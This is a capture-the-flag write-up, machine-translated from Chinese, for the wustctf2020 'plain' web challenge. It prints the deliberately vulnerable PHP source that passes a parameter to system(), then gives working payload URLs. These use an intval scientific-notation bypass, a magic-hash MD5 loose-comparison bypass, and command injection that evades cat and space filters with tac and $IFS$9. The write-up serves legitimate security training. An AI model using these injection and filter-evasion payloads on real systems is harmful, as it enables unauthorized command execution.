当前位置:网站首页>[wustctf2020] plain_ WP
[wustctf2020] plain_ WP
2022-07-05 06:20:00 【Acco_ 30_ L】
List of topics
List of articles
analysis
- Open questions , except hack me, No available information , View source code
- Although there is a problem with coding , But I still found this utilization point bot, The thought of robots.txt Crawler rules for websites
robots.txt Put it under the root directory of the website . Based on this file, the crawler decides which pages under the website are authorized to crawl
- robots.txt
It means to any reptile , Prohibit its access to/fAke_f1agggg.php
A file in a directory
But for this hint , We obviously want to visit to see if there is any available information - /fAke_f1agggg.php
I'm at a loss here , Looking at the source code is nothing
obtain flag
- Try to grab the bag , Find valid information in the response header
- /fl4g.php
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo " I inadvertently looked at my Rolex , I don't want to see the time , Just want to inadvertently , Let you know I'm better than you .</br>";
}else{
die(" Money can't solve the essential problem of the poor ");
}
}else{
die(" Go to Africa ");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo " Think of this CTFer Get flag after , grateful , Run to Donglan bank , Find a restaurant , Get the chef out of here , Stir fry two special dishes by yourself , Pour a glass of white wine in bulk , How to get rich , Don't be a little violent .</br>";
else
die(" I quickly called my fair weather friend , He made a phone call , Put his family in Africa ");
}else{
die(" Go to Africa ");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo " Think of it here. , I'm full and happy , The happiness of rich people is often so simple and unadorned , And it's boring .</br>";
system($get_flag);
}else{
die(" It's almost Africa ");
}
}else{
die(" Go to Africa ");
}
?>
Go to Africa
It's harder to appear , Start code audit
title Level 1
intval() Function to get the integer value of a variable .
(intval($num) < 2020 && intval($num + 1) > 2021)
That is to say, let the incoming num Rounded value is less than 2020, Add 1 After taking an integer, it should be greater than 2021
According to this inspiration , We can try the following- But I don't know why , My compiler does not implement this difference , So we pass parameters directly into the title , Check
<?php
echo intval('2e4');
echo intval(2e4);
echo intval('2e4'+1);
echo intval(2e4+1);
echo intval(1e10);
echo intval('1e10');
?>
http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=%272e4%27
Money can't solve the essential problem of the poorhttp://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4
I inadvertently looked at my Rolex , I don't want to see the time , Just want to inadvertently , Let you know I'm better than you .
Bypass success , And it can be concluded that , The passed in parameters will be automatically converted into strings
Level 2
md5() Function to evaluate the MD5 hash .
($md5==md5($md5))
That is to say, you need to pass in the parameter and its MD5 Hash weak comparison values are equalmd5(0e215962017,32) = 0e291242476940776845150308577824
Pass in the parameterhttp://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017
Bypass success
get flag
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo " Think of it here. , I'm full and happy , The happiness of rich people is often so simple and unadorned , And it's boring .</br>";
system($get_flag);
-strstr(str1,str2) Function is used to determine the string str2 Whether it is str1 The string of . If it is , Then the function returns str1 String from str2 Where the first occurrence begins str1 a null-terminated string ; otherwise , return NULL.
str_ireplace() Function to replace some characters in a string ( Case insensitive ).
- So in get flag There are... In this step 3 Requirements
There can be no spaces in parameters
If there is... In the parameter cat Will be replaced by wctf2020
Parameters are executed as system commands
http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=ls
-http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
tac Bypass cat $IFS$9 Around the spaceflag{6c1c57d3-5462-42d3-be85-df3998d042c7}
边栏推荐
- 1039 Course List for Student
- How to understand the definition of sequence limit?
- 实时时钟 (RTC)
- Network security skills competition in Secondary Vocational Schools -- a tutorial article on middleware penetration testing in Guangxi regional competition
- Shutter web hardware keyboard monitoring
- Chart. JS - Format Y axis - chart js - Formatting Y axis
- Winter vacation water test 1 Summary
- What's wrong with this paragraph that doesn't work? (unresolved)
- Appium foundation - use the first demo of appium
- Arduino 控制的 RGB LED 无限镜
猜你喜欢
MatrixDB v4.5.0 重磅发布,全新推出 MARS2 存储引擎!
Gauss Cancellation acwing 884. Solution d'un système d'équations Xor linéaires par élimination gaussienne
LeetCode-61
Series of how MySQL works (VIII) 14 figures explain the atomicity of MySQL transactions and the principle of undo logging
Appium automation test foundation - Summary of appium test environment construction
Sqlmap tutorial (1)
Doing SQL performance optimization is really eye-catching
20220213-CTF MISC-a_ good_ Idea (use of stegsolve tool) -2017_ Dating_ in_ Singapore
LeetCode-54
How to make water ripple effect? This wave of water ripple effect pulls full of retro feeling
随机推荐
Sqlmap tutorial (1)
Leetcode stack related
__ builtin_ Popcount() counts the number of 1s, which are commonly used in bit operations
Single chip computer engineering experience - layered idea
1039 Course List for Student
MatrixDB v4.5.0 重磅发布,全新推出 MARS2 存储引擎!
our solution
C job interview - casting and comparing - C job interview - casting and comparing
[learning] database: MySQL query conditions have functions that lead to index failure. Establish functional indexes
Leetcode dynamic programming
Niu Mei's math problems
求组合数 AcWing 889. 满足条件的01序列
[learning] database: several cases of index failure
【LeetCode】Easy | 20. Valid parentheses
LeetCode 1200. Minimum absolute difference
栈 AcWing 3302. 表达式求值
Usage scenarios of golang context
Regulations for network security events of vocational group in 2022 Guizhou Vocational College skill competition
打印机脱机时一种容易被忽略的原因
Navicat連接Oracle數據庫報錯ORA-28547或ORA-03135